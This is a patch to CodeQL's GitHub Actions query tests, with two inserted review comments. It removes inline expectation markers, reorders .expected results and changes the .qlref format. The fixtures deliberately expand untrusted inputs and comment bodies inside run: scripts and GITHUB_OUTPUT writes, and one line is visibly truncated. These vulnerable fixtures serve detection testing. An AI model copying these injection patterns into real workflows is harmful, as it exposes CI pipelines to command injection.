| 2 +- .../PotentiallyExposedSystemData.expected | 4 +- .../PotentiallyExposedSystemData.expected | 36 +- .../Security/CWE/CWE-611/XXE.expected | 62 +- .../TaintedCondition.expected | 4 +- .../CWE/CWE-843/TypeConfusion.expected | 20 +- .../CWE-918/RequestForgery.expected | 2 +- .../backdoor/PotentialTimeBomb.expected | 18 +- .../ProcessNameToHashTaintFlow.expected | 2 +- .../UnsafeYearConstruction.expected | 8 +- .../CWE-312/CleartextStorage.expected | 20 +- .../DontInstallRootCert.expected | 8 +- .../InsecureSQLConnection.expected | 8 +- .../ExposureOfPrivateInformation.expected | 12 +- .../HardcodedConnectionString.expected | 6 +- .../CWE-798/HardcodedCredentials.expected | 18 +- .../query-suite/not_included_in_qls.expected | 1 + ...6-ssrf-ipv6-transition-incomplete-guard.md | 4 + .../SsrfIpv6TransitionIncompleteGuard.qhelp | 59 + .../SsrfIpv6TransitionIncompleteGuard.ql | 129 + .../CWE-094-dataURL/CodeInjection.expected | 10 +- 
.../EnvValueAndKeyInjection.expected | 6 +- .../EnvValueInjection.expected | 8 +- ...JwtWithoutVerificationLocalSource.expected | 14 +- .../decodeJwtWithoutVerification.expected | 14 +- .../Security/CWE-918/SSRF.expected | 42 +- ...SsrfIpv6TransitionIncompleteGuard.expected | 2 + .../Security/CWE-022-TarSlip/TarSlip.expected | 60 +- .../Security/CWE-022-TarSlip/ZipSlip.expected | 12 +- .../Security/CWE-079/EmailXss.expected | 30 +- .../XsltInjection.expected | 14 +- .../Security/CWE-094/Js2Py.expected | 4 +- .../Security/CWE-1236/CsvInjection.expected | 8 +- .../PossibleTimingAttackAgainstHash.expected | 6 +- .../TimingAttackAgainstHash.expected | 2 +- .../TimingAttackAgainstHeaderValue.expected | 4 +- ...eTimingAttackAgainstSensitiveInfo.expected | 6 +- .../ConstantSecretKey.expected | 20 +- ...sageOfClientSideEncryptionVersion.expected | 12 +- .../CWE-338/InsecureRandomness.expected | 4 +- .../Security/CWE-346/CorsBypass.expected | 4 +- ...ientSuppliedIpUsedInSecurityCheck.expected | 8 +- .../LdapInsecureAuth.expected | 2 +- .../CWE-522/LdapInsecureAuth.expected | 14 +- .../Security/CWE-770/UnicodeDoS.expected | 14 +- .../CookieInjection.expected | 8 +- .../UntrustedDataToExternalAPI.expected | 14 +- .../Security/CWE-022-TarSlip/TarSlip.expected | 20 +- .../TemplateInjection.expected | 6 +- .../CommandInjection.expected | 20 +- .../ReflectedXss.expected | 8 +- .../SqlInjection.expected | 34 +- .../LdapInjection.expected | 22 +- .../HeaderInjection.expected | 2 +- .../LogInjection.expected | 10 +- .../PamAuthorization.expected | 4 +- .../CleartextLogging.expected | 50 +- .../CleartextStorage.expected | 8 +- .../CleartextStorage.expected | 10 +- .../WeakSensitiveDataHashing.expected | 26 +- .../UnsafeDeserialization.expected | 12 +- .../CWE-601-UrlRedirect/UrlRedirect.expected | 26 +- .../Security/CWE-611-Xxe/Xxe.expected | 6 +- .../XpathInjection.expected | 14 +- .../PolynomialReDoS.expected | 12 +- .../RegexInjection.expected | 8 +- 
.../Security/CWE-776-XmlBomb/XmlBomb.expected | 2 +- .../HardcodedCredentials.expected | 6 +- ql/ql/test/queries/bugs/OrderByConst/Foo.qll | 2 +- .../bugs/OrderByConst/OrderByConst.qlref | 3 +- .../SumWithoutDomain/SumWithoutDomain.qlref | 3 +- .../queries/bugs/SumWithoutDomain/Test.qll | 2 +- .../InlineOverlayCaller.qlref | 3 +- .../overlay/InlineOverlayCaller/Test.qll | 2 +- .../AbstractClassImport.qlref | 3 +- .../AbstractClassImportTest1.qll | 2 +- .../MissingNoInline/MissingNoInline.qlref | 3 +- .../performance/MissingNoInline/Test.qll | 2 +- .../performance/VarUnusedInDisjunct/Test.qll | 18 +- .../VarUnusedInDisjunct.qlref | 3 +- .../AcronymsShouldBeCamelCase.qlref | 3 +- .../style/AcronymsShouldBeCamelCase/Test.qll | 6 +- .../style/CouldBeCast/CouldBeCast.qlref | 3 +- ql/ql/test/queries/style/CouldBeCast/Foo.qll | 10 +- .../DataFlowConfigModuleNaming.qlref | 3 +- .../style/DataFlowConfigModuleNaming/Test.qll | 4 +- .../queries/style/DeadCode/DeadCode.qlref | 3 +- ql/ql/test/queries/style/DeadCode/Foo.qll | 10 +- .../FieldOnlyUsedInCharPred.qll | 2 +- .../FieldOnlyUsedInCharPred.qlref | 3 +- ql/ql/test/queries/style/ImplicitThis/Bad.qll | 2 +- .../test/queries/style/ImplicitThis/Bad2.qll | 2 +- .../style/ImplicitThis/ImplicitThis.qlref | 3 +- .../style/MissingParameterInQlDoc/Foo.qll | 4 +- .../MissingParameterInQlDoc.qlref | 3 +- .../MissingQualityMetadata.qlref | 3 +- .../BadQualityMaintainabilityWrongToplevel.ql | 2 +- .../testcases/BadQualityMultipleTopLevel.ql | 2 +- .../testcases/BadQualityNoToplevel.ql | 2 +- .../BadQualityReliabilityWrongToplevel.ql | 2 +- .../MissingSecurityMetadata.qlref | 3 +- .../testcases/BadNoSecurity.ql | 2 +- .../testcases/BadNoSeverity.ql | 2 +- .../style/Misspelling/Misspelling.qlref | 3 +- ql/ql/test/queries/style/Misspelling/Test.qll | 12 +- ql/ql/test/queries/style/NonDocBlock/Foo.qll | 4 +- .../style/NonDocBlock/NonDocBlock.qlref | 3 +- .../OmittableExists/OmittableExists.qlref | 3 +- 
.../queries/style/OmittableExists/Test.qll | 2 +- .../style/QlRefInlineExpectations/Test3.qlref | 3 +- .../test/queries/style/RedundantCast/Foo.qll | 6 +- .../style/RedundantCast/RedundantCast.qlref | 3 +- .../test/queries/style/RedundantImport/D.qll | 2 +- .../RedundantImport/RedundantImport.qlref | 3 +- .../RedundantOverride/RedundantOverride.qll | 22 +- .../RedundantOverride/RedundantOverride.qlref | 3 +- .../SwappedParameterNames.qlref | 3 +- .../style/SwappedParameterNames/Test.qll | 2 +- .../style/UseInstanceofExtension/Foo.qll | 8 +- .../UseInstanceofExtension.qlref | 3 +- .../style/UseSetLiteral/UseSetLiteral.qlref | 3 +- .../test/queries/style/UseSetLiteral/test.qll | 16 +- .../ValidatePredicateGetReturns.qlref | 3 +- .../ValidatePredicateGetReturns/test.qll | 12 +- .../DecompressionBombs.expected | 42 +- .../ImproperLdapAuth.expected | 6 +- .../InsecureRandomness.expected | 4 +- .../LdapInjection/Ldapinjection.expected | 10 +- .../TemplateInjection.expected | 10 +- .../XPathInjection/XPathInjection.expected | 22 +- .../cwe-022-ZipSlip/ZipSlip.expected | 14 +- .../UnsafeYamlDeserialization.expected | 30 +- .../ManuallyCheckHttpVerb.expected | 16 +- .../weak-params/WeakParams.expected | 10 +- .../MissingFullAnchor.expected | 8 +- .../cwe-078/KernelOpen/KernelOpen.expected | 22 +- .../UnsafeShellCommandConstruction.expected | 32 +- .../cwe-079/UnsafeHtmlConstruction.expected | 10 +- .../security/cwe-089/SqlInjection.expected | 98 +- .../UnsafeCodeConstruction.expected | 24 +- .../security/cwe-117/LogInjection.expected | 16 +- .../PolynomialReDoS.expected | 58 +- .../RegExpInjection.expected | 12 +- .../cwe-134/TaintedFormatString.expected | 28 +- .../cwe-209/StackTraceExposure.expected | 8 +- .../cwe-312/CleartextLogging.expected | 46 +- .../cwe-312/CleartextStorage.expected | 58 +- .../cwe-327/WeakSensitiveDataHashing.expected | 16 +- .../UnsafeDeserialization.expected | 4 +- .../UnsafeDeserialization.expected | 4 +- .../UnsafeDeserialization.expected | 56 
+- .../HardcodedDataInterpretedAsCode.expected | 8 +- .../security/cwe-601/UrlRedirect.expected | 22 +- .../cwe-611/libxml-backend/Xxe.expected | 10 +- .../security/cwe-611/xxe/Xxe.expected | 48 +- .../cwe-732/WeakFilePermissions.expected | 24 +- .../cwe-798/HardcodedCredentials.expected | 24 +- .../ConditionalBypass.expected | 8 +- .../cwe-912/HttpToFileAccess.expected | 6 +- .../security/cwe-915/MassAssignment.expected | 44 +- .../cwe-918/ServerSideRequestForgery.expected | 8 +- .../DecompressionApi.expected | 6 +- .../UnsafeUnpack/UnsafeUnpack.expected | 6 +- .../CWE-079/UnsafeWebViewFetch.expected | 38 +- .../Security/CWE-089/SqlInjection.expected | 228 +- .../StaticInitializationVector.expected | 60 +- .../CWE-134/UncontrolledFormatString.expected | 48 +- .../CWE-259/ConstantPassword.expected | 54 +- .../CWE-311/CleartextStorageDatabase.expected | 280 +- .../CWE-311/CleartextTransmission.expected | 64 +- .../CleartextStoragePreferences.expected | 32 +- .../Security/CWE-327/ECBEncryption.expected | 20 +- .../CWE-328/WeakPasswordHashing.expected | 98 +- .../CWE-328/WeakSensitiveDataHashing.expected | 74 +- .../Security/CWE-730/RegexInjection.expected | 48 +- .../Security/CWE-760/ConstantSalt.expected | 38 +- .../InsufficientHashIterations.expected | 10 +- 517 files changed, 13813 insertions(+), 3297 deletions(-) create mode 100644 cpp/downgrades/0853f43dc8c08deecb473c54a2b70da8597f1ab5/old.dbscheme create mode 100644 cpp/downgrades/0853f43dc8c08deecb473c54a2b70da8597f1ab5/semmlecode.cpp.dbscheme create mode 100644 cpp/downgrades/0853f43dc8c08deecb473c54a2b70da8597f1ab5/upgrade.properties create mode 100644 cpp/ql/lib/upgrades/ef8d209a22e27413aaaeff4446f0ecb9fa2c227b/old.dbscheme create mode 100644 cpp/ql/lib/upgrades/ef8d209a22e27413aaaeff4446f0ecb9fa2c227b/semmlecode.cpp.dbscheme create mode 100644 cpp/ql/lib/upgrades/ef8d209a22e27413aaaeff4446f0ecb9fa2c227b/upgrade.properties create mode 100644 
javascript/ql/src/change-notes/2026-06-06-ssrf-ipv6-transition-incomplete-guard.md create mode 100644 javascript/ql/src/experimental/Security/CWE-918/SsrfIpv6TransitionIncompleteGuard.qhelp create mode 100644 javascript/ql/src/experimental/Security/CWE-918/SsrfIpv6TransitionIncompleteGuard.ql create mode 100644 javascript/ql/test/experimental/Security/CWE-918/SsrfIpv6TransitionIncompleteGuard/SsrfIpv6TransitionIncompleteGuard.expected diff --git a/actions/ql/test/query-tests/Models/.github/workflows/reusable_workflow.yml b/actions/ql/test/query-tests/Models/.github/workflows/reusable_workflow.yml index de43f610827a..c2e9e17160d3 100644 --- a/actions/ql/test/query-tests/Models/.github/workflows/reusable_workflow.yml +++ b/actions/ql/test/query-tests/Models/.github/workflows/reusable_workflow.yml @@ -3,14 +3,14 @@ name: Reusable workflow example on: workflow_call: inputs: - config-path: # $ Source[actions/reusable-workflow-sinks] Source[actions/reusable-workflow-summaries] + config-path: required: true type: string outputs: workflow-output1: - value: ${{ jobs.job1.outputs.job-output1 }} # $ Alert[actions/reusable-workflow-summaries] + value: ${{ jobs.job1.outputs.job-output1 }} workflow-output2: - value: ${{ jobs.job1.outputs.job-output2 }} # $ Alert[actions/reusable-workflow-sources] + value: ${{ jobs.job1.outputs.job-output2 }} secrets: token: required: true @@ -26,9 +26,9 @@ jobs: env: CONFIG_PATH: ${{ inputs.config-path }} run: | - echo ${{ inputs.config-path }} # $ Alert[actions/reusable-workflow-sinks] + echo ${{ inputs.config-path }} echo "::set-output name=step-output::$CONFIG_PATH" - name: Get changed files id: step2 - uses: tj-actions/changed-files@v40 # $ Source[actions/reusable-workflow-sources] + uses: tj-actions/changed-files@v40 diff --git a/actions/ql/test/query-tests/Models/CompositeActionsSinks.expected b/actions/ql/test/query-tests/Models/CompositeActionsSinks.expected index 33f7bd28de6f..0a5bfe433e91 100644 
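Review bot: With the `# $ Source[...]` and `# $ Alert[...]` markers removed, nothing in this fixture records which lines the model queries are expected to flag. In the second hunk, `echo ${{ inputs.config-path }}` expands a caller-supplied workflow input inside a `run:` script, and the new line carries no hint that it is the intended sink. `output1.yml` and `output2.yml` later in this patch keep a `# VULNERABLE` comment in their scripts, so a plain comment here would match them, for example `config-path: # caller-controlled input, expected taint source` on the input and a `# VULNERABLE` line at the top of the `run:` block. The same gap applies to the `action1/action.yml` hunks, on the `steps.replace.outputs.value` and `steps.source.outputs.tainted` lines. A comment added inside a `run:` block may change the script text the query reports, so the `.expected` files might need regenerating.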
--- a/actions/ql/test/query-tests/Models/CompositeActionsSinks.expected +++ b/actions/ql/test/query-tests/Models/CompositeActionsSinks.expected @@ -1,6 +1,3 @@ -#select -| action1/action.yml:32:18:32:51 | steps.replace.outputs.value | action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:32:18:32:51 | steps.replace.outputs.value | Sink | -| action1/action.yml:35:25:35:50 | inputs.who-to-greet | action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:35:25:35:50 | inputs.who-to-greet | Sink | edges | action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:28:18:28:43 | inputs.who-to-greet | provenance | | | action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:35:25:35:50 | inputs.who-to-greet | provenance | | @@ -13,3 +10,6 @@ nodes | action1/action.yml:32:18:32:51 | steps.replace.outputs.value | semmle.label | steps.replace.outputs.value | | action1/action.yml:35:25:35:50 | inputs.who-to-greet | semmle.label | inputs.who-to-greet | subpaths +#select +| action1/action.yml:32:18:32:51 | steps.replace.outputs.value | action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:32:18:32:51 | steps.replace.outputs.value | Sink | +| action1/action.yml:35:25:35:50 | inputs.who-to-greet | action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:35:25:35:50 | inputs.who-to-greet | Sink | diff --git a/actions/ql/test/query-tests/Models/CompositeActionsSinks.qlref b/actions/ql/test/query-tests/Models/CompositeActionsSinks.qlref index d03797620365..e5cb225ed249 100644 --- a/actions/ql/test/query-tests/Models/CompositeActionsSinks.qlref +++ b/actions/ql/test/query-tests/Models/CompositeActionsSinks.qlref @@ -1,2 +1 @@ -query: Models/CompositeActionsSinks.ql -postprocess: utils/test/InlineExpectationsTestQuery.ql +Models/CompositeActionsSinks.ql 
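Review bot: The new `CompositeActionsSinks.qlref` is a bare query path, so `utils/test/InlineExpectationsTestQuery.ql` no longer runs for this test and the generated `.expected` file becomes the only oracle. A lost alert would then show up only as a deleted row when that file is regenerated. The subject visible for this patch (`C++`) does not explain why the Actions model tests are taken off inline expectations, so this may be unintended; if so, keep the `query:` / `postprocess:` form. Separately, this hunk produces a one-line file (`@@ -1,2 +1 @@`), while the five sibling hunks (`CompositeActionsSources.qlref`, `CompositeActionsSummaries.qlref`, `ReusableWorkflowsSinks.qlref`, `ReusableWorkflowsSources.qlref`, `ReusableWorkflowsSummaries.qlref`) each add an empty second line (a bare `+`). Pick one form, preferably without the trailing blank line.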
diff --git a/actions/ql/test/query-tests/Models/CompositeActionsSources.expected b/actions/ql/test/query-tests/Models/CompositeActionsSources.expected index 3f13be734e2e..3be74bb8bf12 100644 --- a/actions/ql/test/query-tests/Models/CompositeActionsSources.expected +++ b/actions/ql/test/query-tests/Models/CompositeActionsSources.expected @@ -1,9 +1,3 @@ -#select -| action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | Source | -| action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | action1/action.yml:41:30:41:55 | inputs.who-to-greet | action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | Source | -| action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | Source | -| action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | action1/action.yml:42:7:44:4 | Uses Step: changed-files | action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | Source | -| action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | action1/action.yml:48:19:48:70 | steps.changed-files.outputs.all_changed_files | action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | Source | edges | action1/action.yml:37:7:42:4 | Run Step: reflector [reflected] | action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | provenance | | | action1/action.yml:41:30:41:55 | inputs.who-to-greet | action1/action.yml:37:7:42:4 | Run Step: reflector [reflected] | provenance | | 
@@ -19,3 +13,9 @@ nodes | action1/action.yml:44:7:48:70 | Run Step: source [tainted] | semmle.label | Run Step: source [tainted] | | action1/action.yml:48:19:48:70 | steps.changed-files.outputs.all_changed_files | semmle.label | steps.changed-files.outputs.all_changed_files | subpaths +#select +| action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | Source | +| action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | action1/action.yml:41:30:41:55 | inputs.who-to-greet | action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | Source | +| action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | Source | +| action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | action1/action.yml:42:7:44:4 | Uses Step: changed-files | action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | Source | +| action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | action1/action.yml:48:19:48:70 | steps.changed-files.outputs.all_changed_files | action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | Source | diff --git a/actions/ql/test/query-tests/Models/CompositeActionsSources.qlref b/actions/ql/test/query-tests/Models/CompositeActionsSources.qlref index fcdfec84bb78..3b833d669125 100644 --- a/actions/ql/test/query-tests/Models/CompositeActionsSources.qlref +++ b/actions/ql/test/query-tests/Models/CompositeActionsSources.qlref @@ -1,2 +1,2 @@ -query: Models/CompositeActionsSources.ql -postprocess: utils/test/InlineExpectationsTestQuery.ql +Models/CompositeActionsSources.ql + 
diff --git a/actions/ql/test/query-tests/Models/CompositeActionsSummaries.expected b/actions/ql/test/query-tests/Models/CompositeActionsSummaries.expected index 43db3e5afa27..067edb68bb1c 100644 --- a/actions/ql/test/query-tests/Models/CompositeActionsSummaries.expected +++ b/actions/ql/test/query-tests/Models/CompositeActionsSummaries.expected @@ -1,5 +1,3 @@ -#select -| action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | Summary | edges | action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:41:30:41:55 | inputs.who-to-greet | provenance | | | action1/action.yml:37:7:42:4 | Run Step: reflector [reflected] | action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | provenance | | @@ -10,3 +8,5 @@ nodes | action1/action.yml:37:7:42:4 | Run Step: reflector [reflected] | semmle.label | Run Step: reflector [reflected] | | action1/action.yml:41:30:41:55 | inputs.who-to-greet | semmle.label | inputs.who-to-greet | subpaths +#select +| action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | Summary | diff --git a/actions/ql/test/query-tests/Models/CompositeActionsSummaries.qlref b/actions/ql/test/query-tests/Models/CompositeActionsSummaries.qlref index 7508e12c9815..ea9b7a304e6b 100644 --- a/actions/ql/test/query-tests/Models/CompositeActionsSummaries.qlref +++ b/actions/ql/test/query-tests/Models/CompositeActionsSummaries.qlref @@ -1,2 +1,2 @@ -query: Models/CompositeActionsSummaries.ql -postprocess: utils/test/InlineExpectationsTestQuery.ql +Models/CompositeActionsSummaries.ql + diff --git a/actions/ql/test/query-tests/Models/ReusableWorkflowsSinks.expected b/actions/ql/test/query-tests/Models/ReusableWorkflowsSinks.expected index 3a496c7751e8..18e9f0186dfd 100644 
--- a/actions/ql/test/query-tests/Models/ReusableWorkflowsSinks.expected +++ b/actions/ql/test/query-tests/Models/ReusableWorkflowsSinks.expected @@ -1,5 +1,3 @@ -#select -| .github/workflows/reusable_workflow.yml:29:17:29:41 | inputs.config-path | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:29:17:29:41 | inputs.config-path | Sink | edges | .github/workflows/calling_workflow.yml:12:5:15:2 | Job: call2 [workflow-output1] | .github/workflows/calling_workflow.yml:35:20:35:62 | needs.call2.outputs.workflow-output1 | provenance | | | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:27:25:27:49 | inputs.config-path | provenance | | @@ -22,3 +20,5 @@ nodes | .github/workflows/reusable_workflow.yml:27:25:27:49 | inputs.config-path | semmle.label | inputs.config-path | | .github/workflows/reusable_workflow.yml:29:17:29:41 | inputs.config-path | semmle.label | inputs.config-path | subpaths +#select +| .github/workflows/reusable_workflow.yml:29:17:29:41 | inputs.config-path | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:29:17:29:41 | inputs.config-path | Sink | diff --git a/actions/ql/test/query-tests/Models/ReusableWorkflowsSinks.qlref b/actions/ql/test/query-tests/Models/ReusableWorkflowsSinks.qlref index 8cc9921223a3..fa8344d4bf91 100644 --- a/actions/ql/test/query-tests/Models/ReusableWorkflowsSinks.qlref +++ b/actions/ql/test/query-tests/Models/ReusableWorkflowsSinks.qlref @@ -1,2 +1,2 @@ -query: Models/ReusableWorkflowsSinks.ql -postprocess: utils/test/InlineExpectationsTestQuery.ql +Models/ReusableWorkflowsSinks.ql + diff --git a/actions/ql/test/query-tests/Models/ReusableWorkflowsSources.expected b/actions/ql/test/query-tests/Models/ReusableWorkflowsSources.expected index c9132156dad9..c76034f74d46 100644 
--- a/actions/ql/test/query-tests/Models/ReusableWorkflowsSources.expected +++ b/actions/ql/test/query-tests/Models/ReusableWorkflowsSources.expected @@ -1,5 +1,3 @@ -#select -| .github/workflows/reusable_workflow.yml:13:17:13:52 | jobs.job1.outputs.job-output2 | .github/workflows/reusable_workflow.yml:31:9:33:43 | Uses Step: step2 | .github/workflows/reusable_workflow.yml:13:17:13:52 | jobs.job1.outputs.job-output2 | Source | edges | .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output2] | .github/workflows/reusable_workflow.yml:13:17:13:52 | jobs.job1.outputs.job-output2 | provenance | | | .github/workflows/reusable_workflow.yml:23:21:23:63 | steps.step2.outputs.all_changed_files | .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output2] | provenance | | @@ -10,3 +8,5 @@ nodes | .github/workflows/reusable_workflow.yml:23:21:23:63 | steps.step2.outputs.all_changed_files | semmle.label | steps.step2.outputs.all_changed_files | | .github/workflows/reusable_workflow.yml:31:9:33:43 | Uses Step: step2 | semmle.label | Uses Step: step2 | subpaths +#select +| .github/workflows/reusable_workflow.yml:13:17:13:52 | jobs.job1.outputs.job-output2 | .github/workflows/reusable_workflow.yml:31:9:33:43 | Uses Step: step2 | .github/workflows/reusable_workflow.yml:13:17:13:52 | jobs.job1.outputs.job-output2 | Source | diff --git a/actions/ql/test/query-tests/Models/ReusableWorkflowsSources.qlref b/actions/ql/test/query-tests/Models/ReusableWorkflowsSources.qlref index 4a35c574ad5b..fe4299bdba49 100644 --- a/actions/ql/test/query-tests/Models/ReusableWorkflowsSources.qlref +++ b/actions/ql/test/query-tests/Models/ReusableWorkflowsSources.qlref @@ -1,2 +1,2 @@ -query: Models/ReusableWorkflowsSources.ql -postprocess: utils/test/InlineExpectationsTestQuery.ql +Models/ReusableWorkflowsSources.ql + 
diff --git a/actions/ql/test/query-tests/Models/ReusableWorkflowsSummaries.expected b/actions/ql/test/query-tests/Models/ReusableWorkflowsSummaries.expected index 2a6c4269d525..8589d82d8259 100644 --- a/actions/ql/test/query-tests/Models/ReusableWorkflowsSummaries.expected +++ b/actions/ql/test/query-tests/Models/ReusableWorkflowsSummaries.expected @@ -1,5 +1,3 @@ -#select -| .github/workflows/reusable_workflow.yml:11:17:11:52 | jobs.job1.outputs.job-output1 | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:11:17:11:52 | jobs.job1.outputs.job-output1 | Summary | edges | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:27:25:27:49 | inputs.config-path | provenance | | | .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output1] | .github/workflows/reusable_workflow.yml:11:17:11:52 | jobs.job1.outputs.job-output1 | provenance | | @@ -14,3 +12,5 @@ nodes | .github/workflows/reusable_workflow.yml:25:9:31:6 | Run Step: step1 [step-output] | semmle.label | Run Step: step1 [step-output] | | .github/workflows/reusable_workflow.yml:27:25:27:49 | inputs.config-path | semmle.label | inputs.config-path | subpaths +#select +| .github/workflows/reusable_workflow.yml:11:17:11:52 | jobs.job1.outputs.job-output1 | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:11:17:11:52 | jobs.job1.outputs.job-output1 | Summary | diff --git a/actions/ql/test/query-tests/Models/ReusableWorkflowsSummaries.qlref b/actions/ql/test/query-tests/Models/ReusableWorkflowsSummaries.qlref index 7655b5f8010a..3547c8a4d07d 100644 --- a/actions/ql/test/query-tests/Models/ReusableWorkflowsSummaries.qlref +++ b/actions/ql/test/query-tests/Models/ReusableWorkflowsSummaries.qlref 
@@ -1,2 +1,2 @@ -query: Models/ReusableWorkflowsSummaries.ql -postprocess: utils/test/InlineExpectationsTestQuery.ql +Models/ReusableWorkflowsSummaries.ql + diff --git a/actions/ql/test/query-tests/Models/action1/action.yml b/actions/ql/test/query-tests/Models/action1/action.yml index 4780a1529f83..787fb9f588be 100644 --- a/actions/ql/test/query-tests/Models/action1/action.yml +++ b/actions/ql/test/query-tests/Models/action1/action.yml @@ -1,17 +1,17 @@ name: 'Hello World' description: 'Greet someone' inputs: - who-to-greet: # id of input # $ Source[actions/composite-action-sinks] Source[actions/composite-action-summaries] + who-to-greet: # id of input description: 'Who to greet' required: true default: 'World' outputs: reflected: description: "Reflected input" - value: ${{ steps.reflector.outputs.reflected }} # $ Alert[actions/composite-action-sources] Alert[actions/composite-action-summaries] + value: ${{ steps.reflector.outputs.reflected }} tainted: description: "Reflected input" - value: ${{ steps.source.outputs.tainted}} # $ Alert[actions/composite-action-sources] + value: ${{ steps.source.outputs.tainted}} runs: using: "composite" 
@@ -29,23 +29,23 @@ runs: find: 'foo' replace: '' - id: sink - run: echo ${{ steps.replace.outputs.value }} # $ Alert[actions/composite-action-sinks] + run: echo ${{ steps.replace.outputs.value }} shell: bash - name: Vulnerable Set Greeting - run: echo "Hello ${{ inputs.who-to-greet }}." # $ Alert[actions/composite-action-sinks] + run: echo "Hello ${{ inputs.who-to-greet }}." shell: bash - id: reflector run: echo "reflected=$(echo $INPUT_WHO_TO_GREET)" >> $GITHUB_OUTPUT shell: bash env: - INPUT_WHO_TO_GREET: ${{ inputs.who-to-greet }} # $ Source[actions/composite-action-sources] + INPUT_WHO_TO_GREET: ${{ inputs.who-to-greet }} - id: changed-files uses: tj-actions/changed-files@v40 - - id: source # $ Source[actions/composite-action-sources] + - id: source run: echo "tainted=$(echo $TAINTED)" >> $GITHUB_OUTPUT shell: bash env: - TAINTED: ${{ steps.changed-files.outputs.all_changed_files }} # $ Source[actions/composite-action-sources] + TAINTED: ${{ steps.changed-files.outputs.all_changed_files }} diff --git a/actions/ql/test/query-tests/Security/CWE-074/.github/workflows/output1.yml b/actions/ql/test/query-tests/Security/CWE-074/.github/workflows/output1.yml index 73368388c9fd..01036f711481 100644 --- a/actions/ql/test/query-tests/Security/CWE-074/.github/workflows/output1.yml +++ b/actions/ql/test/query-tests/Security/CWE-074/.github/workflows/output1.yml @@ -6,11 +6,11 @@ jobs: steps: - id: clob1 env: - BODY: ${{ github.event.comment.body }} # $ Source + BODY: ${{ github.event.comment.body }} run: | # VULNERABLE echo "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT - echo "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT # $ Alert + echo "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT - id: clob2 run: | echo ${{ steps.clob1.outputs.OUTPUT_1 }} 
@@ -32,8 +32,8 @@ jobs: with: run_id: ${{ github.event.workflow_run.id }} name: pr_number - - id: clob1 # $ Source + - id: clob1 run: | # VULNERABLE echo "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT - echo "OUTPUT_2=$(> $GITHUB_OUTPUT # $ Alert + echo "OUTPUT_2=$(> $GITHUB_OUTPUT diff --git a/actions/ql/test/query-tests/Security/CWE-074/.github/workflows/output2.yml b/actions/ql/test/query-tests/Security/CWE-074/.github/workflows/output2.yml index 0e57bee8ac9a..614de61b0cb7 100644 --- a/actions/ql/test/query-tests/Security/CWE-074/.github/workflows/output2.yml +++ b/actions/ql/test/query-tests/Security/CWE-074/.github/workflows/output2.yml @@ -6,18 +6,18 @@ jobs: steps: - id: clob1 env: - BODY: ${{ github.event.comment.body }} # $ Source + BODY: ${{ github.event.comment.body }} run: | # VULNERABLE echo $BODY - echo "::set-output name=OUTPUT::SAFE" # $ Alert + echo "::set-output name=OUTPUT::SAFE" - id: clob2 env: - BODY: ${{ github.event.comment.body }} # $ Source + BODY: ${{ github.event.comment.body }} run: | # VULNERABLE echo "::set-output name=OUTPUT::SAFE" - echo $BODY # $ Alert + echo $BODY - id: clob3 run: | echo ${{ steps.clob1.outputs.OUTPUT }} 
